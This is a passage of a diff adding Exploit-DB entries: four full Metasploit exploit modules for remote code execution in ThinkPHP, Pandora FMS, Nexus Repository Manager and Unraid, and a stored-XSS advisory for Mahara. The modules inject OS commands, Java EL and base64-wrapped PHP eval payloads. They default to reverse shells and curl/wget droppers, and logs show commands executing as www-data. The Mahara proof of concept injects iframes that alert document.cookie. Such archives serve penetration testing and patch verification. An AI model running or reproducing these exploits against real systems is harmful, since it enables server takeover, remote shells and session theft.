+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::AutoCheck
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ThinkPHP Multiple PHP Injection RCEs',
+ 'Description' => %q{
+ This module exploits one of two PHP injection vulnerabilities in the
+ ThinkPHP web framework to execute code as the web user.
+
+ Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
+ vulnerable to a separate vulnerability. The module will automatically
+ attempt to detect the version of the software.
+
+ Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
+ },
+ 'Author' => [
+ # Discovery by unknown threaty threat actors
+ 'wvu' # Module
+ ],
+ 'References' => [
+ # https://www.google.com/search?q=thinkphp+rce, tbh
+ ['CVE', '2018-20062'], # NoneCMS 1.3 using ThinkPHP
+ ['CVE', '2019-9082'], # Open Source BMS 1.1.1 using ThinkPHP
+ ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'],
+ ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce']
+ ],
+ 'DisclosureDate' => '2018-12-10', # Unknown discovery date
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['unix', 'linux'],
+ 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+ 'Privileged' => false,
+ 'Targets' => [
+ ['Unix Command',
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Type' => :unix_cmd,
+ 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
+ ],
+ ['Linux Dropper',
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Type' => :linux_dropper,
+ 'DefaultOptions' => {
+ 'CMDSTAGER::FLAVOR' => :curl,
+ 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+ }
+ ]
+ ],
+ 'DefaultTarget' => 1,
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+ }
+ ))
+
+ register_options([
+ Opt::RPORT(8080),
+ OptString.new('TARGETURI', [true, 'Base path', '/'])
+ ])
+
+ register_advanced_options([
+ # NOTE: You may want to tweak this for long-running commands like find(1)
+ OptFloat.new('CmdOutputTimeout',
+ [true, 'Timeout for cmd/unix/generic output', 3.5])
+ ])
+
+ # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
+ import_target_defaults
+ end
+
+=begin
+ wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' -
+ * Trying 127.0.0.1...
+ * TCP_NODELAY set
+ * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
+ > GET /index.php?s=1353 HTTP/1.1
+ > Host: 127.0.0.1:8080
+ > User-Agent: curl/7.54.0
+ > Accept: */*
+ >
+ < HTTP/1.1 404 Not Found
+ < Date: Mon, 13 Apr 2020 06:42:15 GMT
+ < Server: Apache/2.4.25 (Debian)
+ < X-Powered-By: PHP/7.2.5
+ < Content-Length: 7332
+ < Content-Type: text/html; charset=utf-8
+ <
+ { [7332 bytes data]
+ * Connection #0 to host 127.0.0.1 left intact
+ 5.0.20wvu@kharak:~$
+=end
+ def check
+ # An unknown route will trigger the ThinkPHP copyright with version
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'vars_get' => {'s' => rand_text_alpha(8..42)}
+ )
+
+ unless res
+ return CheckCode::Unknown('Target did not respond to check request.')
+ end
+
+ unless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m)
+ return CheckCode::Unknown(
+ 'Target did not respond with ThinkPHP copyright.'
+ )
+ end
+
+ # Get the first copyright <span> containing the version
+ version = res.get_html_document.at('//div[@class = "copyright"]/span')&.text
+
+ unless (version = version.scan(/^V([\d.]+)$/).flatten.first)
+ return CheckCode::Detected(
+ 'Target did not respond with ThinkPHP version.'
+ )
+ end
+
+ # Make the parsed version a comparable ivar for automatic exploitation
+ @version = Gem::Version.new(version)
+
+ if @version <= Gem::Version.new('5.0.23')
+ return CheckCode::Appears("ThinkPHP #{@version} is a vulnerable version.")
+ end
+
+ CheckCode::Safe("ThinkPHP #{@version} is NOT a vulnerable version.")
+ end
+
+ def exploit
+ # NOTE: Automatic check is implemented by the AutoCheck mixin
+ super
+
+ # This is just extra insurance in case I screwed up the check method
+ unless @version
+ fail_with(Failure::NoTarget, 'Could not detect ThinkPHP version')
+ end
+
+ print_status("Targeting ThinkPHP #{@version} automatically")
+
+ case target['Type']
+ when :unix_cmd
+ execute_command(payload.encoded)
+ when :linux_dropper
+ # XXX: Only opts[:noconcat] may induce responses from the server
+ execute_cmdstager
+ else # This is just extra insurance in case I screwed up the info hash
+ fail_with(Failure::NoTarget, "Could not select target #{target['Type']}")
+ end
+ end
+
+ def execute_command(cmd, _opts = {})
+ vprint_status("Executing command: #{cmd}")
+
+ if @version < Gem::Version.new('5.0.23')
+ exploit_less_than_5_0_23(cmd)
+ elsif @version == Gem::Version.new('5.0.23')
+ exploit_5_0_23(cmd)
+ else # This is just extra insurance in case I screwed up the exploit method
+ fail_with(Failure::NoTarget, "Could not target ThinkPHP #{@version}")
+ end
+ end
+
+=begin
+ wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1
+ * Trying 127.0.0.1...
+ * TCP_NODELAY set
+ * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
+ > GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1
+ > Host: 127.0.0.1:8080
+ > User-Agent: curl/7.54.0
+ > Accept: */*
+ >
+ < HTTP/1.1 200 OK
+ < Date: Mon, 13 Apr 2020 06:43:45 GMT
+ < Server: Apache/2.4.25 (Debian)
+ < X-Powered-By: PHP/7.2.5
+ < Vary: Accept-Encoding
+ < Transfer-Encoding: chunked
+ < Content-Type: text/html; charset=UTF-8
+ <
+ { [60 bytes data]
+ * Connection #0 to host 127.0.0.1 left intact
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ wvu@kharak:~$
+=end
+ def exploit_less_than_5_0_23(cmd)
+ # XXX: The server may block on executing our payload and won't respond
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'vars_get' => {
+ 's' => '/Index/\\think\\app/invokefunction',
+ 'function' => 'call_user_func_array',
+ 'vars[0]' => 'system', # TODO: Debug ARCH_PHP
+ 'vars[1][]' => cmd
+ },
+ 'partial' => true
+ }, datastore['CmdOutputTimeout'])
+
+ return unless res && res.code == 200
+
+ vprint_good("Successfully executed command: #{cmd}")
+
+ return unless datastore['PAYLOAD'] == 'cmd/unix/generic'
+
+ # HACK: Print half of the doubled-up command output
+ vprint_line(res.body[0, res.body.length / 2])
+ end
+
+=begin
+ wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1
+ * Trying 127.0.0.1...
+ * TCP_NODELAY set
+ * Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0)
+ > POST /index.php?s=captcha HTTP/1.1
+ > Host: 127.0.0.1:8081
+ > User-Agent: curl/7.54.0
+ > Accept: */*
+ > Content-Length: 72
+ > Content-Type: application/x-www-form-urlencoded
+ >
+ } [72 bytes data]
+ * upload completely sent off: 72 out of 72 bytes
+ < HTTP/1.1 200 OK
+ < Date: Mon, 13 Apr 2020 06:44:05 GMT
+ < Server: Apache/2.4.25 (Debian)
+ < X-Powered-By: PHP/7.2.12
+ < Vary: Accept-Encoding
+ < Transfer-Encoding: chunked
+ < Content-Type: text/html; charset=UTF-8
+ <
+ { [60 bytes data]
+ * Connection #0 to host 127.0.0.1 left intact
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ wvu@kharak:~$
+=end
+ def exploit_5_0_23(cmd)
+ # XXX: The server may block on executing our payload and won't respond
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'vars_get' => {'s' => 'captcha'},
+ 'vars_post' => {
+ '_method' => '__construct',
+ 'filter[]' => 'system', # TODO: Debug ARCH_PHP
+ 'method' => 'get',
+ 'server[REQUEST_METHOD]' => cmd
+ },
+ 'partial' => true
+ }, datastore['CmdOutputTimeout'])
+
+ return unless res && res.code == 200
+
+ vprint_good("Successfully executed command: #{cmd}")
+
+ return unless datastore['PAYLOAD'] == 'cmd/unix/generic'
+
+ # Clean up output from cmd/unix/generic
+ vprint_line(res.body.gsub(/\n<!DOCTYPE html>.*/m, ''))
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/48334.rb b/exploits/linux/remote/48334.rb
new file mode 100755
index 000000000..d3fe0375f
--- /dev/null
+++ b/exploits/linux/remote/48334.rb
@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Pandora FMS Ping Authenticated Remote Code Execution',
+ 'Description' => %q{
+ This module exploits a vulnerability found in Pandora FMS 7.0NG and lower.
+ net_tools.php in Pandora FMS 7.0NG allows remote attackers to execute arbitrary OS commands.
+ },
+ 'Author' =>
+ [
+ 'Onur ER <onur@onurer.net>' # Vulnerability discovery and Metasploit module
+ ],
+ 'DisclosureDate' => '2020-03-09',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Privileged' => false,
+ 'Targets' =>
+ [
+ ['Automatic Target', {}]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'Payload' => 'linux/x86/meterpreter/reverse_tcp'
+ },
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
+ OptString.new('USERNAME', [true, 'The username to authenticate with']),
+ OptString.new('PASSWORD', [true, 'The password to authenticate with'])
+ ]
+ )
+ end
+
+ def check
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri, 'index.php')
+ })
+
+ unless res
+ vprint_error 'Connection failed'
+ return CheckCode::Unknown
+ end
+
+ unless res.body =~ /Pandora/i
+ return CheckCode::Safe
+ end
+
+ pandora_version = res.body.scan(/<div id="ver_num">v(.*?)<\/div>/).flatten.first
+ version = Gem::Version.new(pandora_version)
+
+ print_status("Pandora FMS version #{version}") if version
+
+ if Gem::Version.new(version) <= Gem::Version.new('7.0NG')
+ return Exploit::CheckCode::Appears
+ end
+
+ CheckCode::Detected
+ end
+
+ def authenticate
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri, 'index.php'),
+ 'vars_get' => {
+ 'login' => '1'
+ },
+ 'vars_post' => {
+ 'nick' => datastore['USERNAME'],
+ 'pass' => datastore['PASSWORD'],
+ 'login_button' => 'Login'
+ }
+ })
+
+ return auth_succeeded?(res)
+ end
+
+ def auth_succeeded?(res)
+ unless res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
+ print_error('Authentication failed!')
+ return false
+ end
+ print_good('Successfully authenticated')
+ print_status('Attempting to retrieve session cookie')
+ @cookie = res.get_cookies
+ unless @cookie.include?('PHPSESSID')
+ print_error('Error retrieving cookie!')
+ return false
+ end
+ print_good("Successfully retrieved session cookie: #{@cookie}")
+ true
+ end
+
+ def exploit
+ print_status('Exploiting...')
+ execute_cmdstager(flavor: :wget, nospace: true)
+ end
+
+ def execute_command(cmd, opts = {})
+ print_status("Attempting to authenticate using (#{datastore['USERNAME']}:#{datastore['PASSWORD']})")
+ auth = authenticate
+ unless auth
+ fail_with Failure::NoAccess, 'Please provide a valid username and password.'
+ end
+
+ id_agente = 1
+ while !session_created? && id_agente <= 10
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri, 'index.php'),
+ 'cookie' => @cookie,
+ 'vars_get' => {
+ 'sec' => 'estado',
+ 'sec2' => 'operation/agentes/ver_agente',
+ 'tab' => 'extension',
+ 'id_agente' => "#{id_agente}",
+ 'id_extension' => 'network_tools'
+ },
+ 'vars_post' => {
+ 'operation' => '2',
+ 'select_ips' => ";#{cmd}",
+ 'community' => 'public',
+ 'submit' => 'Execute'
+ }
+ })
+
+ id_agente += 1
+ end
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/48343.rb b/exploits/linux/remote/48343.rb
new file mode 100755
index 000000000..13456ea0f
--- /dev/null
+++ b/exploits/linux/remote/48343.rb
@@ -0,0 +1,196 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::AutoCheck
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Nexus Repository Manager Java EL Injection RCE',
+ 'Description' => %q{
+ This module exploits a Java Expression Language (EL) injection in Nexus
+ Repository Manager versions up to and including 3.21.1 to execute code
+ as the Nexus user.
+
+ This is a post-authentication vulnerability, so credentials are required
+ to exploit the bug. Any user regardless of privilege level may be used.
+
+ Tested against 3.21.1-01.
+ },
+ 'Author' => [
+ 'Alvaro Muñoz', # Discovery
+ 'wvu' # Module
+ ],
+ 'References' => [
+ ['CVE', '2020-10199'],
+ ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype'],
+ ['URL', 'https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31']
+ ],
+ 'DisclosureDate' => '2020-03-31', # Vendor advisory
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Privileged' => false,
+ 'Targets' => [['Nexus Repository Manager <= 3.21.1', {}]],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'},
+ 'CmdStagerFlavor' => %i[curl wget],
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+ }
+ ))
+
+ register_options([
+ Opt::RPORT(8081),
+ OptString.new('TARGETURI', [true, 'Base path', '/']),
+ OptString.new('USERNAME', [true, 'Nexus username', 'admin']),
+ OptString.new('PASSWORD', [true, 'Nexus password'])
+ ])
+ end
+
+ def post_auth?
+ # Pre-auth RCE? https://twitter.com/iamnoooob/status/1246182773427240967
+ true
+ end
+
+ # Send a GET / request to the server, check the response for a Server header
+ # containing the Nexus version, and then check if it's a vulnerable version
+ def check
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path)
+ )
+
+ unless res
+ return CheckCode::Unknown('Target did not respond to check request.')
+ end
+
+ unless res.headers['Server']
+ return CheckCode::Unknown('Target did not respond with Server header.')
+ end
+
+ # Example Server header:
+ # Server: Nexus/3.21.1-01 (OSS)
+ version = res.headers['Server'].scan(%r{^Nexus/([\d.-]+)}).flatten.first
+
+ unless version
+ return CheckCode::Unknown('Target did not respond with Nexus version.')
+ end
+
+ if Gem::Version.new(version) <= Gem::Version.new('3.21.1')
+ return CheckCode::Appears("Nexus #{version} is a vulnerable version.")
+ end
+
+ CheckCode::Safe("Nexus #{version} is NOT a vulnerable version.")
+ end
+
+ def exploit
+ # NOTE: Automatic check is implemented by the AutoCheck mixin
+ super
+
+ print_status("Executing command stager for #{datastore['PAYLOAD']}")
+
+ # This will drop a binary payload to disk and execute it!
+ execute_cmdstager(
+ noconcat: true,
+ cookie: login(datastore['USERNAME'], datastore['PASSWORD'])
+ )
+ end
+
+ def login(username, password)
+ print_status("Logging in with #{username}:#{password}")
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path,
+ '/service/rapture/session'),
+ 'vars_post' => {
+ 'username' => Rex::Text.encode_base64(username),
+ 'password' => Rex::Text.encode_base64(password)
+ },
+ 'partial' => true # XXX: Return partial response despite timeout
+ }, 3.5)
+
+ unless res
+ fail_with(Failure::Unknown, 'Target did not respond to login request')
+ end
+
+ cookie = res.get_cookies
+
+ unless res.code == 204 && cookie.match(/NXSESSIONID=[\h-]+/)
+ fail_with(Failure::NoAccess, 'Could not log in with specified creds')
+ end
+
+ print_good("Logged in with #{cookie}")
+ cookie
+ end
+
+ # This is defined so that CmdStager can use it!
+ def execute_command(cmd, opts = {})
+ vprint_status("Executing command: #{cmd}")
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path,
+ '/service/rest/beta/repositories/go/group'),
+ # HACK: Bypass CSRF token with random User-Agent header
+ 'agent' => rand_text_english(8..42),
+ 'cookie' => opts[:cookie],
+ 'ctype' => 'application/json',
+ 'data' => json_payload(cmd)
+ )
+
+ unless res
+ fail_with(Failure::Unknown, 'Target did not respond to payload request')
+ end
+
+ unless res.code == 400 && res.body.match(/java\.lang\.UNIXProcess@\h+/)
+ fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
+ end
+
+ print_good("Successfully executed command: #{cmd}")
+ end
+
+ # PoC based off API docs for /service/rest/beta/repositories/go/group:
+ # http://localhost:8081/#admin/system/api
+ def json_payload(cmd)
+ {
+ 'name' => 'internal',
+ 'online' => true,
+ 'storage' => {
+ 'blobStoreName' => 'default',
+ 'strictContentTypeValidation' => true
+ },
+ 'group' => {
+ # XXX: memberNames has to be an array, but the API example was a string
+ 'memberNames' => [el_payload(cmd)]
+ }
+ }.to_json
+ end
+
+ # Helpful resource from which I borrowed the EL payload:
+ # https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
+ def el_payload(cmd)
+ # HACK: Format our EL expression nicely and then strip introduced whitespace
+ el = <<~EOF.gsub(/\s+/, '')
+ ${
+ "".getClass().forName("java.lang.Runtime").getMethods()[6].invoke(
+ "".getClass().forName("java.lang.Runtime")
+ ).exec("PATCH_ME")
+ }
+ EOF
+
+ # Patch in our command, escaping any double quotes
+ el.sub('PATCH_ME', cmd.gsub('"', '\\"'))
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/48353.rb b/exploits/linux/remote/48353.rb
new file mode 100755
index 000000000..55f048b35
--- /dev/null
+++ b/exploits/linux/remote/48353.rb
@@ -0,0 +1,101 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::PhpEXE
+
+ Rank = ExcellentRanking
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution',
+ 'Description' => %q{
+ This module exploits two vulnerabilities affecting Unraid 6.8.0.
+ An authentication bypass is used to gain access to the administrative
+ interface, and an insecure use of the extract PHP function can be abused
+ for arbitrary code execution as root.
+ },
+ 'Author' =>
+ [
+ 'Nicolas CHATELAIN <n.chatelain@sysdream.com>'
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2020-5847' ],
+ [ 'CVE', '2020-5849' ],
+ [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],
+ [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['php'],
+ 'Privileged' => true,
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ [ 'Automatic', {}]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Feb 10 2020'
+ )
+ )
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/'])
+ ]
+ )
+ end
+
+ def check
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
+ 'method' => 'GET'
+ )
+
+ unless res
+ return CheckCode::Unknown('Connection failed')
+ end
+
+ unless res.code == 200
+ return CheckCode::Safe('Unexpected reply')
+ end
+
+ /\sVersion:\s(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2}) / =~ res.body
+
+ if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')
+ return CheckCode::Appears("Unraid version #{version} appears to be vulnerable")
+ end
+
+ CheckCode::Safe
+ end
+
+ def exploit
+ begin
+ vprint_status('Sending exploit code')
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
+ 'method' => 'GET',
+ 'encode_params' => false,
+ 'vars_get' =>
+ {
+ 'path' => 'x',
+ 'site[x][text]' => Rex::Text.uri_encode("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", 'hex-normal')
+ }
+ )
+
+ if res.nil?
+ print_good('Request timed out, OK if running a non-forking/blocking payload...')
+ elsif res.code == 302
+ fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')
+ else
+ print_warning("Unexpected response code #{res.code}, please check your payload.")
+ end
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+ end
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/webapps/48367.txt b/exploits/linux/webapps/48367.txt
new file mode 100644
index 000000000..acf9f3180
--- /dev/null
+++ b/exploits/linux/webapps/48367.txt
@@ -0,0 +1,248 @@
+# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-21
+# Vendor: https://mahara.org
+# Software Link: https://launchpad.net/mahara
+# CVE: N/A
+
+Document Title:
+===============
+Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2217
+
+Release Date:
+=============
+2020-04-21
+
+Common Vulnerability Scoring System:
+====================================
+4.3
+
+Affected Product(s):
+====================
+Catalyst IT Ltd.
+Product: Mahara v19.10.2 - CMS (Web-Application)
+https://launchpad.net/mahara & https://mahara.org
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-21: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in
+the official Mahara v19.10.2 CMS web-application series.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser
+to web-application requests from the application-side.
+
+The persistent vulnerability is located in the `nombre` and
+`descripción` parameters of the `Ficheros` module in the
+`groupfiles.php` file.
+Remote attackers with low privileges are able to inject own malicious
+persistent script code as files and foldernames. The injected code can
+be used to attack the frontend or backend of the web-application. The
+request method to inject is POST and the attack vector is located on
+the application-side. Files are able to be reviewed in the backend by
+higher privileged accounts and can be shared.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external redirects to
+malicious source and persistent manipulation of affected application
+modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Ficheros (Files Manager)
+
+Vulnerable Input(s):
+[+] Crear Carpeta
+
+Vulnerable File(s):
+[+] groupfiles.php
+
+
+Vulnerable Parameter(s):
+[+] nombre
+[+] descripción
+
+Affected Module(s):
+[+] Página principal
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by low privileged web
+application user account with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Manual steps to reproduce ...
+1. Open the web-application and login as regular user
+2. Move inside the mygroup management
+3. Open the ficheros tab on top
+4. Inject test payload into the crear carpeta (Nombre & Descripción)
+input field for the página principal to output
+Note: The execution point occurs on edit, list and delete interaction
+5. The created path listings are available for higher privileged user
+account that review (Backend)
+6. Successul reproduce of the persistent cross site web vulnerability!
+
+
+PoC: Vulnerable Source (Inject via Crear Carpeta Input for Página Principal)
+<tr id="file:7191" class="file-item folder no-hover ui-droppable">
+<td class="icon-cell">
+<div class="icon-drag ui-draggable ui-draggable-handle" id="drag:7191"
+tabindex="0">
+<span class="sr-only">Seleccionar y arrastrar para mover >"<iframe
+src=evil.source onload=alert(document.cookie)></iframe>
+>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe></span>
+<span class="icon-folder-open icon icon-lg " role="presentation"
+aria-hidden="true"></span>
+</div></td>
+<td class="filename">
+<a
+href="https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=7191&owner=group&ownerid=27"
+
+id="changefolder:7191" class="inner-link changefolder">
+<span class="sr-only">Carpeta:</span>
+<span class="display-title ">>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>
+>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe></span>
+</a></td>
+<td class="filedescription d-none d-md-table-cell">
+>"<iframe></iframe> >"<iframe></iframe></td>
+<td class="filesize"></td>
+<td class="filedate">20/04/2020</td>
+<!-- Ensure space for 3 buttons (in the case of a really long single
+line string in a user input field -->
+<td class="text-right control-buttons ">
+<div class="btn-group">
+... ...
+<button name="files_filebrowser_edit[7191]" class="btn btn-secondary
+btn-sm">
+<span class="icon icon-pencil-alt icon-lg" role="presentation"
+aria-hidden="true"></span>
+<span class="sr-only">Edit folder ">"<iframe
+src=evil.source
+onload=alert(document.cookie)></iframe>
+>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>"</span></button>
+<button name="files_filebrowser_delete[7191]" class="btn btn-secondary
+btn-sm">
+<span class="icon icon-trash-alt text-danger icon-lg"
+role="presentation" aria-hidden="true"></span>
+<span class="sr-only">Delete folder ">"<iframe
+src=evil.source
+onload=alert(document.cookie)></iframe>
+>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>"</span>
+</button></div></td>
+
+
+--- PoC Session Logs [POST] --- (Mygroup Ficheros)
+https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
+Host: mahara_cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data;
+boundary=---------------------------98107146915324237501974151621
+Content-Length: 4879
+Origin: https://mahara_cms.localhost:8080
+Connection: keep-alive
+Referer:
+https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
+Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
+mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
+folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página
+principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
+files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0&
+files_filebrowser_edit_title=>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe> >"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>&files_filebrowser_edit_description=>"<iframe
+src=evil.source onload=alert(document.cookie)></iframe>
+>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on&
+files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=&
+files_filebrowser_edit_licensor=>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe> >"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>&files_filebrowser_edit_licensorurl=>"<iframe
+src=evil.source onload=alert(document.cookie)></iframe>
+>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>&files_filebrowser_edit_allowcomments=on&
+files_filebrowser_update[7191]=Guardar
+cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1
+-
+POST: HTTP/2.0 200 OK
+content-type: text/html; charset=UTF-8
+vary: Accept-Encoding
+cache-control: no-store, no-cache, must-revalidate
+set-cookie:
+mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
+path=/; secure; HttpOnly
+content-encoding: br
+X-Firefox-Spdy: h2-
+https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
+-
+Host: mahara_cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
